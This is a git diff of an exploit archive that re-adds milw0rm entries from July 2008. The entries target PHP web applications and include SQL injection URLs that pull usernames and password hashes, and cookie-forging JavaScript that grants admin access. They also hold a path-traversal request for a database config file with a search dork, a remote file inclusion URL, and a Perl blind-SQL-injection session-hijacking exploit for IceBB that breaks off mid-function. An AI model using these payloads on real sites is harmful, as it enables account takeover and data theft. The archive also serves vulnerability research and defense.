+http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*
+
+Greatz : aLL My Friend'Z and str0ke
+
+
+========================================From Turkey============================================= 
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6115.txt b/platforms/php/webapps/6115.txt
index ee8c10238..bbd418211 100755
--- a/platforms/php/webapps/6115.txt
+++ b/platforms/php/webapps/6115.txt
@@ -1,50 +1,50 @@
-  ###################################################################################
-  #                                                                                 #
-  #      ...:::::EZWebAlbum Insecure Cookie Handling Vulnerability ::::....         #           
-  ###################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(Zahra:zh_virangar)
-
-special tnx :my master hadihadi
-
-tnx to:MR.nosrati,black.shadowes,MR.hesy
-
-& all virangar members & all hackerz
--------
-DESCRIPTION:
-EZWebAlbum, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
----
-some code in index.php:
-
-    if ( $HTTP_POST_VARS['enteredadminpassword'] == $adminpassword )
-    {
-        setcookie("photoalbumadmin","1");
-        header("Location: index.php");
-    }
-**********************
-now vuln code in constants.inc:
-$gotalbumadminrights = False;
-
-if (isset($photoalbumadmin))
-{
-    $gotalbumadminrights = True;
-}//SET ADMIN RIGHTS IF COOKIE FOUND
----
-exploit:
-javascript:document.cookie = "photoalbumadmin=1; path=/";
------
-now   you can get admin access and manage the cms ;)
-[+]Example:add a new page in addpage.php
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-07-21]
+  ###################################################################################
+  #                                                                                 #
+  #      ...:::::EZWebAlbum Insecure Cookie Handling Vulnerability ::::....         #           
+  ###################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(Zahra:zh_virangar)
+
+special tnx :my master hadihadi
+
+tnx to:MR.nosrati,black.shadowes,MR.hesy
+
+& all virangar members & all hackerz
+-------
+DESCRIPTION:
+EZWebAlbum, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+---
+some code in index.php:
+
+    if ( $HTTP_POST_VARS['enteredadminpassword'] == $adminpassword )
+    {
+        setcookie("photoalbumadmin","1");
+        header("Location: index.php");
+    }
+**********************
+now vuln code in constants.inc:
+$gotalbumadminrights = False;
+
+if (isset($photoalbumadmin))
+{
+    $gotalbumadminrights = True;
+}//SET ADMIN RIGHTS IF COOKIE FOUND
+---
+exploit:
+javascript:document.cookie = "photoalbumadmin=1; path=/";
+-----
+now   you can get admin access and manage the cms ;)
+[+]Example:add a new page in addpage.php
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6117.txt b/platforms/php/webapps/6117.txt
index a7829fc00..1261bbcb7 100755
--- a/platforms/php/webapps/6117.txt
+++ b/platforms/php/webapps/6117.txt
@@ -1,56 +1,56 @@
-  _____ _   _ _____  _____ _____ _____  
- /  ___| |_| |  _  \|  _  |  _  |_   _| 
- | (___|  _  | [_)_/| (_) | (_) | | |   
- \_____|_| |_|_| |_||_____|_____| |_|   
-        C. H. R. O. O. T.  SECURITY  GROUP
-        - -- ----- --- -- -- ---- --- -- - 
-                     http://www.chroot.org
-
-                          _   _ _ _____ ____ ____ __  _ 
-        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
-        Conference 2008  |  _  | | | | | (__| () |     |
-                         |_| |_|_| |_| \____|____|_|\__|
-                                      http://www.hitcon.org
-
-
-Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities
-
-Author ======:: unohope [at] chroot [dot] org
-
-IRC =========:: irc.chroot.org #chroot
-
-ScriptName ==:: YouTube Blog
-
-Download ====:: http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip
-
-Mirror ======:: http://www.badongo.com/file/10507193
-
-______________________
-
-magic_quotes_gpc = Off
-safe_mode = Off
-
-_____
-[SQL]
-
-http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
-
-_____
-[XSS]
-
-http://victim/ytb/mensaje.php?m=
-
-_____
-[RFI]
-
-http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt
-
-
-and more .. = =
-
-______
-[NOTE]
-
-!! This is just for educational purposes, DO NOT use for illegal. !!
-
-# milw0rm.com [2008-07-22]
+  _____ _   _ _____  _____ _____ _____  
+ /  ___| |_| |  _  \|  _  |  _  |_   _| 
+ | (___|  _  | [_)_/| (_) | (_) | | |   
+ \_____|_| |_|_| |_||_____|_____| |_|   
+        C. H. R. O. O. T.  SECURITY  GROUP
+        - -- ----- --- -- -- ---- --- -- - 
+                     http://www.chroot.org
+
+                          _   _ _ _____ ____ ____ __  _ 
+        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
+        Conference 2008  |  _  | | | | | (__| () |     |
+                         |_| |_|_| |_| \____|____|_|\__|
+                                      http://www.hitcon.org
+
+
+Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities
+
+Author ======:: unohope [at] chroot [dot] org
+
+IRC =========:: irc.chroot.org #chroot
+
+ScriptName ==:: YouTube Blog
+
+Download ====:: http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip
+
+Mirror ======:: http://www.badongo.com/file/10507193
+
+______________________
+
+magic_quotes_gpc = Off
+safe_mode = Off
+
+_____
+[SQL]
+
+http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
+
+_____
+[XSS]
+
+http://victim/ytb/mensaje.php?m=
+
+_____
+[RFI]
+
+http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt
+
+
+and more .. = =
+
+______
+[NOTE]
+
+!! This is just for educational purposes, DO NOT use for illegal. !!
+
+# milw0rm.com [2008-07-22]
diff --git a/platforms/php/webapps/6125.txt b/platforms/php/webapps/6125.txt
index e1c4a3b8a..cf187cd9f 100755
--- a/platforms/php/webapps/6125.txt
+++ b/platforms/php/webapps/6125.txt
@@ -1,38 +1,38 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Atom PhotoBlog ( atomPhotoBlog.php do )
-##                            
-## http://sourceforge.net/projects/atomphotoblog/                           
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-24]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Atom PhotoBlog ( atomPhotoBlog.php do )
+##                            
+## http://sourceforge.net/projects/atomphotoblog/                           
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-24]
diff --git a/platforms/php/webapps/6126.txt b/platforms/php/webapps/6126.txt
index 0f089cb09..279b30448 100755
--- a/platforms/php/webapps/6126.txt
+++ b/platforms/php/webapps/6126.txt
@@ -1,11 +1,11 @@
-Name: [AFD] i-base <= 2.03
-Author: Dyshoo
-Vendor: http://www.i-base.net/
-Dork: "inurl:ibase site:de"
-
-http://[site]/ibase/zubehoer/download.php?filename=[file]
-
-Database config:
-http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php
-
-# milw0rm.com [2008-07-24]
+Name: [AFD] i-base <= 2.03
+Author: Dyshoo
+Vendor: http://www.i-base.net/
+Dork: "inurl:ibase site:de"
+
+http://[site]/ibase/zubehoer/download.php?filename=[file]
+
+Database config:
+http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php
+
+# milw0rm.com [2008-07-24]
diff --git a/platforms/php/webapps/6127.htm b/platforms/php/webapps/6127.htm
index d653fe03c..35190255d 100755
--- a/platforms/php/webapps/6127.htm
+++ b/platforms/php/webapps/6127.htm
@@ -1,21 +1,21 @@
-
    WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD
    
-
    SaO
    
-
    BiyoSecurityTeam || www.biyosecurity.com
    
-Plugin URI: http://giulioganci.netsons.org/downloads-manager
-    
    
-    
    
-
-    
    
-       
-          
-           
-         
-         
-           
-           
-         
-       
    Local File
    
-    
    
-    
    
-
-# milw0rm.com [2008-07-24]
+
    WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD
    
+
    SaO
    
+
    BiyoSecurityTeam || www.biyosecurity.com
    
+Plugin URI: http://giulioganci.netsons.org/downloads-manager
+    
    
+    
    
+
+    
    
+       
+          
+           
+         
+         
+           
+           
+         
+       
    Local File
    
+    
    
+    
    
+
+# milw0rm.com [2008-07-24]
diff --git a/platforms/php/webapps/6128.txt b/platforms/php/webapps/6128.txt
index 69a206f02..4f1627146 100755
--- a/platforms/php/webapps/6128.txt
+++ b/platforms/php/webapps/6128.txt
@@ -1,36 +1,36 @@
-###############################################################
-#################### i love abeer ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Live Music Plus v1.1.0
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : IRAQI
-
-##
-##
-##
-## Email  : expl0it.zone@googlemail.com
-##
-##
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
-##
-## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--
-##
-########################
-########################
- 
-1) Download script :  http://www.nersoft.com/
-2) Passwords Md5
- 
-#############################################################################
-
-# milw0rm.com [2008-07-24]
+###############################################################
+#################### i love abeer ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Live Music Plus v1.1.0
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : IRAQI
+
+##
+##
+##
+## Email  : expl0it.zone@googlemail.com
+##
+##
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
+##
+## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--
+##
+########################
+########################
+ 
+1) Download script :  http://www.nersoft.com/
+2) Passwords Md5
+ 
+#############################################################################
+
+# milw0rm.com [2008-07-24]
diff --git a/platforms/php/webapps/6131.txt b/platforms/php/webapps/6131.txt
index 4df74732b..d53115017 100755
--- a/platforms/php/webapps/6131.txt
+++ b/platforms/php/webapps/6131.txt
@@ -1,25 +1,25 @@
-##############################################################
-
-XMRS Multiple Vulnerabilities (ZeroDay at 25-07-2008)
-Author: AzzCoder [azzcoder@hotmail.com]
-Product: http://www.xrms.org/
-Product Type: CRM
-Thanks: coresecurity.com
-
-Remote File Inclusion
-	File: activities/workflow-activities.php
-	Variable: $include_directory
-	Required register_globals: Yes
-
-XSS
-	Multiple Files
-	Variable: $msg
-	Quote limitations: Yes
-
-Information Gathering
-	tests/info.php
-	phpinfo() call
-
-##############################################################
-
-# milw0rm.com [2008-07-25]
+##############################################################
+
+XMRS Multiple Vulnerabilities (ZeroDay at 25-07-2008)
+Author: AzzCoder [azzcoder@hotmail.com]
+Product: http://www.xrms.org/
+Product Type: CRM
+Thanks: coresecurity.com
+
+Remote File Inclusion
+	File: activities/workflow-activities.php
+	Variable: $include_directory
+	Required register_globals: Yes
+
+XSS
+	Multiple Files
+	Variable: $msg
+	Quote limitations: Yes
+
+Information Gathering
+	tests/info.php
+	phpinfo() call
+
+##############################################################
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/php/webapps/6132.txt b/platforms/php/webapps/6132.txt
index 633679a65..1960e20d4 100755
--- a/platforms/php/webapps/6132.txt
+++ b/platforms/php/webapps/6132.txt
@@ -1,19 +1,19 @@
-#Camera Life 2.6.2(id) Sql Injection Vulnerability
-
-
-
-#Author: nuclear
-
-
-
-#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip
-
-
-
-#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --
-
-
-
-#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P
-
-# milw0rm.com [2008-07-25]
+#Camera Life 2.6.2(id) Sql Injection Vulnerability
+
+
+
+#Author: nuclear
+
+
+
+#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip
+
+
+
+#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --
+
+
+
+#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/php/webapps/6133.txt b/platforms/php/webapps/6133.txt
index 837565a8f..3b20871e7 100755
--- a/platforms/php/webapps/6133.txt
+++ b/platforms/php/webapps/6133.txt
@@ -1,38 +1,38 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## FizzMedia 1.51.2 ( comment.php mid )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/*
-##
-########################
-########################
--[[ download ]]-
-http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-25]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## FizzMedia 1.51.2 ( comment.php mid )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/*
+##
+########################
+########################
+-[[ download ]]-
+http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/php/webapps/6134.txt b/platforms/php/webapps/6134.txt
index 5055b1f3a..27d3567a5 100755
--- a/platforms/php/webapps/6134.txt
+++ b/platforms/php/webapps/6134.txt
@@ -1,33 +1,33 @@
-########################################################################################
-#
-#   Name   : phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability
-#   Author : cOndemned [ Dark-Coders ]
-#   Dork   : sorry, today no dork [;
-#   Greetz : ZaBeaTy, str0ke, GregStar, Voo|doo, ixos, 0in, suN8Hclf, TBH, Avantura :*
-#
-########################################################################################
-
-Source code of "picture.php" :
-
-    24.    pt_register('GET', 'image_id');
-    25.
-    26.    if (isset($image_id)) {
-    27.        $result = $db->query("SELECT filetype, data FROM images WHERE image_id = $image_id");
-    28.
-    29.        if ($db->num_rows($result)) {
-    30.            $row = $db->fetch_object($result);
-    31.            header("Content-type: $row->filetype");
-    32.            echo $row->data;
-
-Description :
-
-    line 24 - $image_id is taken from user using $_GET method
-    line 27 - There is absolutly no validation of $image_id + We can se amount of columns - 2
-    line 31 - header type doesn't matter....
-    line 32 - Result of MySQL Query is being printed here.
-        
-Exploit :
-
-    http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*
-
-# milw0rm.com [2008-07-25]
+########################################################################################
+#
+#   Name   : phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability
+#   Author : cOndemned [ Dark-Coders ]
+#   Dork   : sorry, today no dork [;
+#   Greetz : ZaBeaTy, str0ke, GregStar, Voo|doo, ixos, 0in, suN8Hclf, TBH, Avantura :*
+#
+########################################################################################
+
+Source code of "picture.php" :
+
+    24.    pt_register('GET', 'image_id');
+    25.
+    26.    if (isset($image_id)) {
+    27.        $result = $db->query("SELECT filetype, data FROM images WHERE image_id = $image_id");
+    28.
+    29.        if ($db->num_rows($result)) {
+    30.            $row = $db->fetch_object($result);
+    31.            header("Content-type: $row->filetype");
+    32.            echo $row->data;
+
+Description :
+
+    line 24 - $image_id is taken from user using $_GET method
+    line 27 - There is absolutly no validation of $image_id + We can se amount of columns - 2
+    line 31 - header type doesn't matter....
+    line 32 - Result of MySQL Query is being printed here.
+        
+Exploit :
+
+    http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/php/webapps/6136.txt b/platforms/php/webapps/6136.txt
index 22d6b0db7..b8b9d5783 100755
--- a/platforms/php/webapps/6136.txt
+++ b/platforms/php/webapps/6136.txt
@@ -1,67 +1,67 @@
-  ###################################################################################
-  #                                                                                 #
-  #    ...:::::phpwebnews-mysql 0.2 Insecure Cookie Handling Vulnerability ::::.... #           
-  ###################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx :my master hadihadi
-
-tnx to:MR.nosrati,black.shadowes,MR.hesy
-
-& all virangar members & all hackerz
--------
-DESCRIPTION:
-phpwebnews-mysql, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
----
-vuln code in /news_manajemen/index.php: //admin area index page
-line 6-11:
-include('x_inc.php');
-
-$a1 = $_COOKIE['a1'];
-$a2 = $_COOKIE['a2'];
-
-if (password_valid($a1,$a2,'')) // a function in x-inc.php
-**********************
-now vuln code in x-inc.php:
-lin 22-39: //password_valid function codes
-
-function password_valid($pemakai, $password, $ea)
-{
-
-if ( empty($pemakai)||empty($password) )
-  return FALSE;
-
-  // koneksi database
-  $conn = db_connect();
-  if (!$conn)
-    {
-      return FALSE;
-    }
-
-if (empty($ea))
-{
-    $result = mysql_query("select * from user
-                         where user='$pemakai'
-                         and passwd='$password'");
-*******************************************************
-we can do nice and funny job :D
-sql injcetion white cookie values ;)
----
-exploit:
-javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;";
------
-now  you can get admin access and manage the cms ;)
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-07-26]
+  ###################################################################################
+  #                                                                                 #
+  #    ...:::::phpwebnews-mysql 0.2 Insecure Cookie Handling Vulnerability ::::.... #           
+  ###################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx :my master hadihadi
+
+tnx to:MR.nosrati,black.shadowes,MR.hesy
+
+& all virangar members & all hackerz
+-------
+DESCRIPTION:
+phpwebnews-mysql, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+---
+vuln code in /news_manajemen/index.php: //admin area index page
+line 6-11:
+include('x_inc.php');
+
+$a1 = $_COOKIE['a1'];
+$a2 = $_COOKIE['a2'];
+
+if (password_valid($a1,$a2,'')) // a function in x-inc.php
+**********************
+now vuln code in x-inc.php:
+lin 22-39: //password_valid function codes
+
+function password_valid($pemakai, $password, $ea)
+{
+
+if ( empty($pemakai)||empty($password) )
+  return FALSE;
+
+  // koneksi database
+  $conn = db_connect();
+  if (!$conn)
+    {
+      return FALSE;
+    }
+
+if (empty($ea))
+{
+    $result = mysql_query("select * from user
+                         where user='$pemakai'
+                         and passwd='$password'");
+*******************************************************
+we can do nice and funny job :D
+sql injcetion white cookie values ;)
+---
+exploit:
+javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;";
+-----
+now  you can get admin access and manage the cms ;)
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-07-26]
diff --git a/platforms/php/webapps/6137.txt b/platforms/php/webapps/6137.txt
index bdf876fde..b50486e21 100755
--- a/platforms/php/webapps/6137.txt
+++ b/platforms/php/webapps/6137.txt
@@ -1,315 +1,315 @@
-# Author:	__GiReX__		26/07/08
-# Homepage:	girex.altervista.org
-
-# CMS: 		IceBB <= 1.0-RC9.2
-# Site:		icebb.net
-
-# Bug: 		Blind SQL Injection
-# Exploit:	Session Hijacking PoC
-
-# Works regardless of php.ini settings
-
-
-# Description:
-	IceBB is a powerful, fast, free, and open-source forum solution powered by the free PHP and MySQL. 
-	IceBB scales well, no matter how many users or posts, due to its clean and efficient code. 
-	It can also be fully customized to your needs with full skin and language support. 
-	A powerful admin control center, along with easy-to-use moderation tools, 
-	allow you to easily manage all aspects of your forum.
-
-
-# Exploit Discussion:
-
-IceBB get all incoming data (GET/POST) in /includes/functions.php and store them into $input array (class std_func, function capture_input)
-
-# It "cleans" the string vars with this func:  lines  94-106
-
-94.	function clean_string($v)
-	{
-		if(get_magic_quotes_gpc())
-		{
-			$v = stripslashes($v);  <==   We don't need magic quotes = off  :P
-		}
-		
-		//$v	= htmlentities($v,ENT_QUOTES,'UTF-8');
-		$v	= htmlspecialchars($v,ENT_QUOTES);
-		$v	= preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$v);
-		
-		return $v;
-106.	}
-
-
-So it fixes quotes chars... but what about backslashes?  -->  \  <---
-If i put a backslash at the end of an input that is between 2 quote in a query i can manipulate the query
-
-# Let's see:
-# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='{$icebb->input['author']}'"
-
-# Setting author=\  in this query:
-# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='\' "
-
-The end quote will be ignored and we get an error..
-
-How can we exploit that?
-In a query with 2 input..
-
-
-# File: /modules/memebers.php  lines 43-78
-
-	$fleh	= $icebb->input;  <==
-	...
-	foreach($fleh as $k => $g)
-	{	
-	 	...
-		$where_clauses[]  = "{$k}='{$g}'";  <==
-		...
-	}
-	...
-
-	$this->qwhere	= implode(' AND ',$where_clauses);
-	$total	= $db->fetch_result("SELECT COUNT(*) as total FROM icebb_users{$this->qwhere}{$qextra}"); <==
-
-In this query there can be more inputs (GET/POST) for example $username and $url.
-
-If we set username=\  the sintax after it will be quoted and became part of the string
-while from the next quote (the one that came before $url) will became SQL. (so the $url content).
-
-# For example:
-# GET /index.php?act=members&username=a\&url=OR+1#
-
-# Became:
-# "SELECT COUNT(*) as total FROM icebb_users WHERE user_group='a\' AND username='OR 1#' AND id!=0 ORDER BY username ASC"
-
-So whith the parameter $username we can manipulate the query...
-
-Unfortunally i could find only a Blind Sql Injection with this trick.. and.. 
-the passwords stored in db are hashed (md5) and salted.
-
-We can try to Hijacking admin/user's session...
-(but we can't access to admin area that needs special login).
-
-# The function autoLogin() in /includes/classes/login_func.php
-# is called if cookies ar set...  line 153-175
-
-153.function autoLogin()
-    {
-		global $icebb,$db,$config,$std;
-	
-		$uid				= $std->eatCookie('uid');
-		$login_key			= $std->eatCookie('login_key');
-	
-		$icebb->hooks->hook('login_autoLogin', $uid, $login_key);
-	
-		$userq				= $db->query("SELECT u.*,g.* FROM icebb_users AS u LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE u.id=".intval($uid)." AND u.login_key='{$login_key}' LIMIT 1");
-		$udata				= $db->fetch_row($userq);
-		
-		if($db->get_num_rows($userq)>=1)
-		{
-			if($std->eatCookie('pass')==$udata['password'])
-			{
-				$sessid		= md5(uniqid(microtime()));
-				$ip			= $icebb->client_ip;
-				$user_agent	= $std->clean_string($_SERVER['HTTP_USER_AGENT']);
-			
-				//$db->query("DELETE FROM icebb_session_data WHERE username='{$udata['username']}' OR ip='{$ip}'",1);
-
-175.			$sessdata	= $this->create_session($udata['username'],$udata['id'],false,true);
-
-
-If admin has cookies enabled we can login and create/edit/delete posts and topics.
-
-###############################  Perl Exploit Start #############################
-
-
-#!/usr/bin/perl
-# IceBB <= 1.0-RC9.2 Blind SQL Injection
-# Admin/User's Session Hijacking PoC
-# Coded by __GiReX__
-
-use LWP::UserAgent;
- 
-if(not defined $ARGV[1])
-{
-	banner();
-	print "[+] Usage:\tperl  $0      [id]\n";
-	print "[+] Example:\tperl  $0  localhost  /icebb/ 1\n";
-	exit;
-}
-
-my $target  =  ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0].$ARGV[1]:  'http://' . $ARGV[0].$ARGV[1];
-my $id  =  (defined $ARGV[2]) ? $ARGV[2]: 1;  
-
-my $lwp =  new LWP::UserAgent;
-my @cset  =  (48..57, 97..102); 
-
-my ($hash, $key, $user, $prefix) =  (undef, undef, undef, undef);      
-
-banner();
-$user = get_username();
-$prefix =  get_prefix();
-
-print STDOUT "[+] User $id username: $user\n";
-	
-for(my $j = 1; $j <= 32; $j++)
-{  
-    foreach $char(@cset)
-    {	
-		info(chr($char), $hash, "password");
-		$rv = check_char($char, $j, "password");	
-	
-         	if(defined $rv)
-	     	{		
-	         	$hash .= chr($char);
-	         	last;
-	     	}
-    }
-	
-    last if $j > 2 and not defined $hash;
-}	
-
-if(not defined $hash or length($hash) != 32)
-{
-	print STDOUT "\n\n[-] Exploit mistake: probably fixed\n";
-	exit;
-}
-else
-{
-	print STDOUT "\n" x 1; 
-}
-
-for(my $j = 1; $j <= 32; $j++)
-{  
-    foreach $char(@cset)
-    {	
-	  info(chr($char), $key, "loginkey");
-	  $rv = check_char($char, $j, "login_key");	
-	
-          if(defined $rv)
-	  {		
-	       $key .= chr($char);
-	       last;
-	  }
-    }
-	
-    last if $j > 2 and not defined $key;
-}
-
-if(not defined $key or length($key) != 32)
-{
-     print STDOUT "\n\n[-] Exploit mistake: user $id has not a login_key\n";
-     exit;
-}
-
-print "\n\n[+] Attempting to login with user's $id session...\n\n";
-
-$logged = try_login();
-
-if(defined $logged) 
-{
-	print STDOUT "[+] Oh yeah logged in!\n\n";
-	print STDOUT "[+] Try yourself with your browser and these cookies:\n\n";
-	print STDOUT "[+] Cookie: ${prefix}user=${user}; ${prefix}pass=${hash}; \n".
-			 "            ${prefix}uid=${id}; ${prefix}login_key=${key}\n\n";
-}
-else
-{
-	print STDOUT "[-] Attempt failed...\n\n";
-}
-
-print STDOUT "[+] Exploit terminated\n";
-
-
-sub try_login()
-{
-   my $lwp = new LWP::UserAgent;
-      $lwp->default_header('Cookie' => "${prefix}user=${user}; ${prefix}pass=${hash}; ${prefix}uid=${id}; ${prefix}login_key=${key}"); 
-	  
-	  my $res = $lwp->get($target);
-	  
-	  if($res->is_success)
-	  {
-		  if($res->content =~ /User Control Panel/)
-		  {
-			    return 1;
-		  }
-	  }
-	
-  return undef;
-}
-
-sub info
-{
-  my($c, $cur, $str)  =  @_;
-	
-	$cur = '' unless defined $cur;
-	print  STDOUT "[+] User $id ${str}: ${cur}${c}\r";
-	
-  $| = 1; 
-}
-
-sub check_char
-{
-  my ($char, $n, $field)  =  @_ ;
-   
-    my $res = $lwp->get($target."index.php?act=members&username=%5c&url=".
